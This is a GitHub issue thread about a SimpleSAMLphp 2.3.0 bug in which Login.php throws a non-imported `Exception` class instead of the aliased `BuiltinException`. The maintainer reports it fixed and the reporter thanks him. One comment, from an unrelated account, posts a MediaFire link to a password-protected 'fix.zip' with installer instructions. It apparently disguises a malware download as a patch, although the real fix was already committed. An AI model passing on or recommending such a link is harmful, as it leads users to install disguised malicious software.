### ISSUE TITLE
modules/core/src/Controller/Login.php throws non-existent Exception class instead of BuiltinException it has been aliased to

### ISSUE THREAD

**Issue by lordelph** [simplesamlphp/simplesamlphp#2221]
**Specifics of your environment**
1. Are you acting as SP/IdP/proxy?
SP and IdP

2. SimpleSAMLphp: What version are you using?
2.3.0

3. PHP: What version are you using?
8.3.10

4. Platform: unix or Windows?
Linux

5. Webserver: Apache/Nginx/ISS?
Nginx

**Describe the bug**

This [recent commit](https://github.com/simplesamlphp/simplesamlphp/commit/e5882cf22fdf41b394a0aed11ae6adc3697e5bf6) into v2.3.0 has code paths that attempt to throw an `Exception` class that has no corresponding `use` statement. It is likely the intention was to throw `BuiltinException` which is what `Exception` has been aliased to.

**To Reproduce**

This can be reproduced purely from static analysis
- see https://github.com/simplesamlphp/simplesamlphp/blob/bc353baf750e918fdca075580e05d55a39667559/modules/core/src/Controller/Login.php#L327
- compare with `use` statements at top of file - no `Exception` class is defined, but `Exception` has been aliased to `BuiltinException`

**Expected behavior**

Expect the two lines which throw `Exception` to throw `BuiltinException`

**Comment by tvdijen** [comment]
Closed in b9b16b860

Thanks for reporting @lordelph !

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lordelph** [comment]
Fast work! Thank you @tvdijen
